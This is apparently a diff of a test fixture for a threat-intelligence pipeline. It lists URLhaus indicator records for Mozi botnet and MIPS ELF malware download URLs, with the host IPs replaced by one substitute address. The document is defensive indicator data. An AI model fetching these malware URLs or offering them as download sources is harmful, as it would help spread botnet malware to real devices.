"{\"id\":\"961092\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961092/\",\"url\":\"http://112.228.183.24:59027/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.228.183.24\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027834600Z", + "original": "{\"id\":\"961092\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961092/\",\"url\":\"http://89.160.20.156:59027/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22179,18 +22179,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.192.226.105:50639/Mozi.m", + "original": "http://89.160.20.156:50639/Mozi.m", "scheme": "http", "port": 50639, - "domain": "117.192.226.105", - "full": "http://117.192.226.105:50639/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50639/Mozi.m" }, - "ip": "117.192.226.105" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694223055Z", - "original": "{\"id\":\"961090\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961090/\",\"url\":\"http://117.192.226.105:50639/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.192.226.105\",\"date_added\":\"2021-01-14 17:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027841500Z", + "original": "{\"id\":\"961090\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961090/\",\"url\":\"http://89.160.20.156:50639/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22228,18 +22228,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.54.242.73:33534/Mozi.a", + "original": "http://89.160.20.156:33534/Mozi.a", "scheme": "http", "port": 33534, - "domain": "115.54.242.73", - "full": "http://115.54.242.73:33534/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33534/Mozi.a" }, - "ip": "115.54.242.73" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694226321Z", - "original": "{\"id\":\"961086\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961086/\",\"url\":\"http://115.54.242.73:33534/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.54.242.73\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027850700Z", + "original": "{\"id\":\"961086\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961086/\",\"url\":\"http://89.160.20.156:33534/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22277,18 +22277,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.54.208.19:36316/Mozi.m", + "original": "http://89.160.20.156:36316/Mozi.m", "scheme": "http", "port": 36316, - "domain": "115.54.208.19", - "full": "http://115.54.208.19:36316/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36316/Mozi.m" }, - "ip": "115.54.208.19" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694229387Z", - "original": "{\"id\":\"961087\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961087/\",\"url\":\"http://115.54.208.19:36316/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.54.208.19\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027857800Z", + "original": "{\"id\":\"961087\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961087/\",\"url\":\"http://89.160.20.156:36316/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22326,18 +22326,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.97.18.154:47120/Mozi.m", + "original": "http://89.160.20.156:47120/Mozi.m", "scheme": "http", "port": 47120, - "domain": "115.97.18.154", - "full": "http://115.97.18.154:47120/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47120/Mozi.m" }, - "ip": "115.97.18.154" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694232533Z", - "original": "{\"id\":\"961088\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961088/\",\"url\":\"http://115.97.18.154:47120/Mozi.m\",\"url_status\":\"offline\",\"host\":\"115.97.18.154\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027865700Z", + "original": "{\"id\":\"961088\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961088/\",\"url\":\"http://89.160.20.156:47120/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22375,18 +22375,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.213.42.231:46287/Mozi.m", + "original": "http://89.160.20.156:46287/Mozi.m", "scheme": "http", "port": 46287, - "domain": "117.213.42.231", - "full": "http://117.213.42.231:46287/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46287/Mozi.m" }, - "ip": "117.213.42.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694235618Z", - "original": "{\"id\":\"961089\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961089/\",\"url\":\"http://117.213.42.231:46287/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.213.42.231\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027872800Z", + "original": "{\"id\":\"961089\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961089/\",\"url\":\"http://89.160.20.156:46287/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22425,18 +22425,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://42.236.149.218:39536/bin.sh", + "original": "http://89.160.20.156:39536/bin.sh", "scheme": "http", "port": 39536, - "domain": "42.236.149.218", - "full": "http://42.236.149.218:39536/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39536/bin.sh" }, - "ip": "42.236.149.218" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694238684Z", - "original": "{\"id\":\"961085\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961085/\",\"url\":\"http://42.236.149.218:39536/bin.sh\",\"url_status\":\"online\",\"host\":\"42.236.149.218\",\"date_added\":\"2021-01-14 17:14:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.027880Z", + "original": "{\"id\":\"961085\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961085/\",\"url\":\"http://89.160.20.156:39536/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:14:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22474,18 +22474,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.94.181.146:40689/Mozi.m", + "original": "http://89.160.20.156:40689/Mozi.m", "scheme": "http", "port": 40689, - "domain": "59.94.181.146", - "full": "http://59.94.181.146:40689/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40689/Mozi.m" }, - "ip": "59.94.181.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694241910Z", - "original": "{\"id\":\"961083\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961083/\",\"url\":\"http://59.94.181.146:40689/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.94.181.146\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027886900Z", + "original": "{\"id\":\"961083\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961083/\",\"url\":\"http://89.160.20.156:40689/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22523,18 +22523,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.83.3:51123/Mozi.m", + "original": "http://89.160.20.156:51123/Mozi.m", "scheme": "http", "port": 51123, - "domain": "58.249.83.3", - "full": "http://58.249.83.3:51123/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51123/Mozi.m" }, - "ip": "58.249.83.3" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694245707Z", - "original": "{\"id\":\"961084\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961084/\",\"url\":\"http://58.249.83.3:51123/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.83.3\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027893800Z", + "original": "{\"id\":\"961084\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961084/\",\"url\":\"http://89.160.20.156:51123/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22572,18 +22572,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://49.77.198.90:52540/Mozi.a", + "original": "http://89.160.20.156:52540/Mozi.a", "scheme": "http", "port": 52540, - "domain": "49.77.198.90", - "full": "http://49.77.198.90:52540/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52540/Mozi.a" }, - "ip": "49.77.198.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694249554Z", - "original": "{\"id\":\"961082\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961082/\",\"url\":\"http://49.77.198.90:52540/Mozi.a\",\"url_status\":\"online\",\"host\":\"49.77.198.90\",\"date_added\":\"2021-01-14 17:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027900700Z", + "original": "{\"id\":\"961082\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961082/\",\"url\":\"http://89.160.20.156:52540/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22621,18 +22621,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.27.213:56964/Mozi.m", + "original": "http://89.160.20.156:56964/Mozi.m", "scheme": "http", "port": 56964, - "domain": "59.96.27.213", - "full": "http://59.96.27.213:56964/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56964/Mozi.m" }, - "ip": "59.96.27.213" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694252750Z", - "original": "{\"id\":\"961081\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961081/\",\"url\":\"http://59.96.27.213:56964/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.27.213\",\"date_added\":\"2021-01-14 17:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027907600Z", + "original": "{\"id\":\"961081\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961081/\",\"url\":\"http://89.160.20.156:56964/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22670,18 +22670,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.62.80:57120/Mozi.m", + "original": "http://89.160.20.156:57120/Mozi.m", "scheme": "http", "port": 57120, - "domain": "61.52.62.80", - "full": "http://61.52.62.80:57120/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57120/Mozi.m" }, - "ip": "61.52.62.80" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694255856Z", - "original": "{\"id\":\"961078\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961078/\",\"url\":\"http://61.52.62.80:57120/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.62.80\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027914500Z", + "original": "{\"id\":\"961078\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961078/\",\"url\":\"http://89.160.20.156:57120/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22719,18 +22719,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://58.248.113.219:44518/Mozi.a", + "original": "http://89.160.20.156:44518/Mozi.a", "scheme": "http", "port": 44518, - "domain": "58.248.113.219", - "full": "http://58.248.113.219:44518/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44518/Mozi.a" }, - "ip": "58.248.113.219" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694259012Z", - "original": "{\"id\":\"961079\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961079/\",\"url\":\"http://58.248.113.219:44518/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.248.113.219\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027921400Z", + "original": "{\"id\":\"961079\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961079/\",\"url\":\"http://89.160.20.156:44518/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22768,18 +22768,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.22.124:50389/Mozi.m", + "original": "http://89.160.20.156:50389/Mozi.m", "scheme": "http", "port": 50389, - "domain": "58.249.22.124", - "full": "http://58.249.22.124:50389/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50389/Mozi.m" }, - "ip": "58.249.22.124" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694262218Z", - "original": "{\"id\":\"961080\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961080/\",\"url\":\"http://58.249.22.124:50389/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.22.124\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027928600Z", + "original": "{\"id\":\"961080\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961080/\",\"url\":\"http://89.160.20.156:50389/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22817,18 +22817,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.241.176:34335/Mozi.m", + "original": "http://89.160.20.156:34335/Mozi.m", "scheme": "http", "port": 34335, - "domain": "42.224.241.176", - "full": "http://42.224.241.176:34335/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34335/Mozi.m" }, - "ip": "42.224.241.176" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694265344Z", - "original": "{\"id\":\"961077\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961077/\",\"url\":\"http://42.224.241.176:34335/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.241.176\",\"date_added\":\"2021-01-14 17:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027936600Z", + "original": "{\"id\":\"961077\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961077/\",\"url\":\"http://89.160.20.156:34335/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22866,18 +22866,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.234.234.40:54865/Mozi.m", + "original": "http://89.160.20.156:54865/Mozi.m", "scheme": "http", "port": 54865, - "domain": "42.234.234.40", - "full": "http://42.234.234.40:54865/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54865/Mozi.m" }, - "ip": "42.234.234.40" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694268470Z", - "original": "{\"id\":\"961069\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961069/\",\"url\":\"http://42.234.234.40:54865/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.234.234.40\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027943600Z", + "original": "{\"id\":\"961069\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961069/\",\"url\":\"http://89.160.20.156:54865/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22915,18 +22915,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://27.41.216.92:50773/Mozi.a", + "original": "http://89.160.20.156:50773/Mozi.a", "scheme": "http", "port": 50773, - "domain": "27.41.216.92", - "full": "http://27.41.216.92:50773/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50773/Mozi.a" }, - "ip": "27.41.216.92" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694271556Z", - "original": "{\"id\":\"961070\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961070/\",\"url\":\"http://27.41.216.92:50773/Mozi.a\",\"url_status\":\"online\",\"host\":\"27.41.216.92\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027950600Z", + "original": "{\"id\":\"961070\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961070/\",\"url\":\"http://89.160.20.156:50773/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22964,18 +22964,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.237.56.242:52005/Mozi.m", + "original": "http://89.160.20.156:52005/Mozi.m", "scheme": "http", "port": 52005, - "domain": "42.237.56.242", - "full": "http://42.237.56.242:52005/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52005/Mozi.m" }, - "ip": "42.237.56.242" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694274832Z", - "original": "{\"id\":\"961071\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961071/\",\"url\":\"http://42.237.56.242:52005/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.237.56.242\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027957400Z", + "original": "{\"id\":\"961071\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961071/\",\"url\":\"http://89.160.20.156:52005/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23013,18 +23013,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.139.126.241:56066/Mozi.m", + "original": "http://89.160.20.156:56066/Mozi.m", "scheme": "http", "port": 56066, - "domain": "222.139.126.241", - "full": "http://222.139.126.241:56066/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56066/Mozi.m" }, - "ip": "222.139.126.241" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694278188Z", - "original": "{\"id\":\"961072\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961072/\",\"url\":\"http://222.139.126.241:56066/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.139.126.241\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028000500Z", + "original": "{\"id\":\"961072\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961072/\",\"url\":\"http://89.160.20.156:56066/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23062,18 +23062,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.133.120:32915/Mozi.m", + "original": "http://89.160.20.156:32915/Mozi.m", "scheme": "http", "port": 32915, - "domain": "222.137.133.120", - 